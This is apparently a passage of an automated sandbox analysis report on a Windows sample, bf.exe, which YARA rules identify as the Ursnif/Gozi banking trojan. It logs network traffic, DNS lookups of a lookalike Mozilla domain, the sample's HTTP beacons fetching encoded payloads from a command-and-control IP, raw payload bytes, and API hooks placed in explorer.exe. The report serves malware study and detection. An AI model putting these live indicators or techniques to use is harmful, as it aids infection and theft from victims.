                                      Oct 13, 2022 09:30:53.980882883 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980923891 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980941057 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980963945 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981018066 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981030941 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981086016 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981128931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981146097 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981163979 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981168985 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981209040 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981245995 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981246948 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981287003 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981304884 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981326103 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981365919 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981369019 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981415987 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981451035 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.018419027 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.018639088 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022754908 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022804022 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022846937 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022860050 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022891998 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022891998 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022911072 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022948027 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022972107 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.023001909 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.079674006 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.172065973 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414618969 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414688110 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414752007 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414769888 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414797068 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414834023 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414834023 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414840937 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414859056 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414923906 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414927959 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414963961 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415007114 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415045977 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415049076 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415088892 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415102005 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415102005 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415112972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415235043 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415235043 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457063913 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457129955 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457161903 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457195044 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457237959 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457278013 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457319021 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457350016 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457367897 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457391977 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457432032 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457434893 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457454920 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457479000 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457505941 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457514048 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457557917 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457567930 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457600117 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457623959 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457642078 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457674026 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457689047 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457726002 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457772017 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499522924 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499586105 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499625921 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499653101 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499653101 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499665976 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499712944 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499715090 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499715090 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499754906 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499768972 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499799013 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499804020 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499840021 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499845028 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499882936 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499886990 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499919891 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499932051 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499960899 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499967098 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500003099 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500011921 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500041962 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500062943 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500073910 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500101089 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500113964 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500140905 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500157118 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500185013 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500200033 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500226021 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500231981 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500245094 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500282049 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542006969 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542063951 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542104959 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542135954 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542151928 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542152882 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542152882 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542176008 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542217970 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542222977 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542222977 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542258024 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542258024 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542292118 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542310953 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542334080 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542336941 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542375088 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542377949 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542416096 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542418003 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542445898 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542459965 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542483091 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542485952 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542526007 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542529106 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542565107 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542570114 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542594910 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542606115 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542634964 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584462881 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584501982 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584525108 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584599972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584636927 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584636927 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584636927 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584697008 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584733009 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584760904 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584804058 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584825993 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584944010 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585036039 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585130930 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585212946 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585269928 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585347891 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585385084 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585458994 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585479975 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585549116 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585585117 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585653067 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585690975 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585764885 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585802078 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585872889 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585938931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585999012 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586014986 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586075068 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586082935 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586138010 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586149931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586240053 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586277962 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586350918 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627170086 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627224922 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627249956 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627266884 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627301931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627306938 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627307892 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627341986 CEST804969645.8.158.104192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2022 09:29:33.001714945 CEST | 56894 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2022 09:29:33.023427963 CEST | 53 | 56894 | 8.8.8.8 | 192.168.2.5
Oct 13, 2022 09:31:41.033104897 CEST | 50295 | 53 | 192.168.2.5 | 8.8.8.8
Oct 13, 2022 09:31:41.053165913 CEST | 53 | 50295 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2022 09:29:33.001714945 CEST | 192.168.2.5 | 8.8.8.8 | 0x26f4 | Standard query (0) | trackingg-protectioon.cdn1.mozilla.net | A (IP address) | IN (0x0001) | false
Oct 13, 2022 09:31:41.033104897 CEST | 192.168.2.5 | 8.8.8.8 | 0x84d8 | Standard query (0) | trackingg-protectioon.cdn1.mozilla.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2022 09:29:33.023427963 CEST | 8.8.8.8 | 192.168.2.5 | 0x26f4 | Name error (3) | trackingg-protectioon.cdn1.mozilla.net | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2022 09:31:41.053165913 CEST | 8.8.8.8 | 192.168.2.5 | 0x84d8 | Name error (3) | trackingg-protectioon.cdn1.mozilla.net | none | none | A (IP address) | IN (0x0001) | false
• 45.8.158.104
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49696 | 45.8.158.104 | 80 | C:\Users\user\Desktop\bf.exe
Timestamp | kBytes transferred | Direction | Data
Oct 13, 2022 09:30:53.311197996 CEST | 1 | OUT | GET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 45.8.158.104
Connection: Keep-Alive
Cache-Control: no-cache
Oct 13, 2022 09:30:53.640887022 CEST | 2 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 13 Oct 2022 07:30:53 GMT
Content-Type: application/octet-stream
Content-Length: 181392
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="6347bead8b091.bin"
                                      Oct 13, 2022 09:30:53.641108036 CEST12INData Raw: 8c 85 c0 d8 0b a6 c7 7e 15 83 51 d6 88 1f b4 7e ed 06 15 8d 94 8b a9 2f eb e8 9d 23 d0 43 7d 25 4c ae ac dc 94 34 e6 34 b3 42 0e f8 01 2c 8e 32 c3 c6 8f 0b d3 d0 4f 72 03 91 64 ed 68 c1 97 f6 c7 57 1f a0 87 a3 59 1e c0 0c 2b af 21 09 de e5 72 5a
                                      Data Ascii: ~Q~/#C}%L44B,2OrdhWY+!rZR:?Sw%5=\wJ]m)+N2I;$=#w;v*GA=,z#.cN*QAX~K_s~u1jDS/.'_JG>\&!MVM9m
                                      Oct 13, 2022 09:30:53.641143084 CEST14INData Raw: 11 cf f8 51 0b 0f a8 34 66 5d a1 d2 a5 58 ec 7e c5 c8 96 15 1c ed 1a c6 21 ae c5 01 8d 39 71 35 12 9a a1 2d 8d e6 d9 d9 a8 1c b6 a1 28 9a 95 4e 9d 8f 51 c3 53 b4 6e d1 cc 99 42 9e 3e 98 ef 0c 03 eb 49 9f 19 16 dd 71 43 6e 74 c8 02 34 15 2d 8a 67
                                      Data Ascii: Q4f]X~!9q5-(NQSnB>IqCnt4-g(Uzsv;n2E;;x+Biq'ilih)w/h7 {=x$gP+([6}DyE!TG&4&}[!RUbeH3b?NE@n
                                      Oct 13, 2022 09:30:53.733346939 CEST15INData Raw: 9f 86 92 a1 79 bf 93 b5 c6 48 dd 01 c0 a4 80 1f e5 d3 d5 43 f5 1d c3 27 22 f3 34 03 a2 6d 5c e7 8e 27 d5 e8 44 94 bb fa e3 c8 bf 9e ef fa b5 ba 98 26 23 3b f1 29 d0 91 e5 d1 ff a1 b3 b3 0e c4 b6 23 57 5b 79 f8 2c db 4c 10 89 43 bb 38 8b fa 20 a1
                                      Data Ascii: yHC'"4m\'D&#;)#W[y,LC8 +k?h_="=t+pKk3P)EvJwYHk/wKW;?2h}A3{d:Bbi(H}.QLhzlU18b=yA?
                                      Oct 13, 2022 09:30:54.079674006 CEST194OUTGET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                      Host: 45.8.158.104
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 13, 2022 09:30:54.414618969 CEST195INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 13 Oct 2022 07:30:54 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 233114
                                      Connection: keep-alive
                                      Pragma: public
                                      Accept-Ranges: bytes
                                      Expires: 0
                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                      Content-Disposition: inline; filename="6347beae53c67.bin"
                                      Oct 13, 2022 09:30:55.414316893 CEST445OUTGET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                      Host: 45.8.158.104
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 13, 2022 09:30:55.749187946 CEST446INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 13 Oct 2022 07:30:55 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 1977
                                      Connection: keep-alive
                                      Pragma: public
                                      Accept-Ranges: bytes
                                      Expires: 0
                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                      Content-Disposition: inline; filename="6347beafa3faa.bin"


Code Manipulations

Function Name                                              Hook Type  Active in Processes
CreateProcessAsUserW                                       EAT        explorer.exe
CreateProcessAsUserW                                       INLINE     explorer.exe
CreateProcessW                                             EAT        explorer.exe
CreateProcessW                                             INLINE     explorer.exe
CreateProcessA                                             EAT        explorer.exe
CreateProcessA                                             INLINE     explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW   IAT        explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW           IAT        explorer.exe

Function Name                                              Hook Type  New Data
CreateProcessAsUserW                                       EAT        7FFA26CE521C
CreateProcessAsUserW                                       INLINE     0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW                                             EAT        7FFA26CE5200
CreateProcessW                                             INLINE     0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA                                             EAT        7FFA26CE520E
CreateProcessA                                             INLINE     0xFF 0xF2 0x25 0x50 0x00 0x00

Function Name                                              Hook Type  New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW   IAT        7FFA26CE5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW           IAT        6137174

                                      Target ID:0
                                      Start time:09:29:29
                                      Start date:13/10/2022
                                      Path:C:\Users\user\Desktop\bf.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\bf.exe
                                      Imagebase:0x400000
                                      File size:37888 bytes
                                      MD5 hash:B7CE4F9F6ECD85BB5EDBB6964226FDB6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
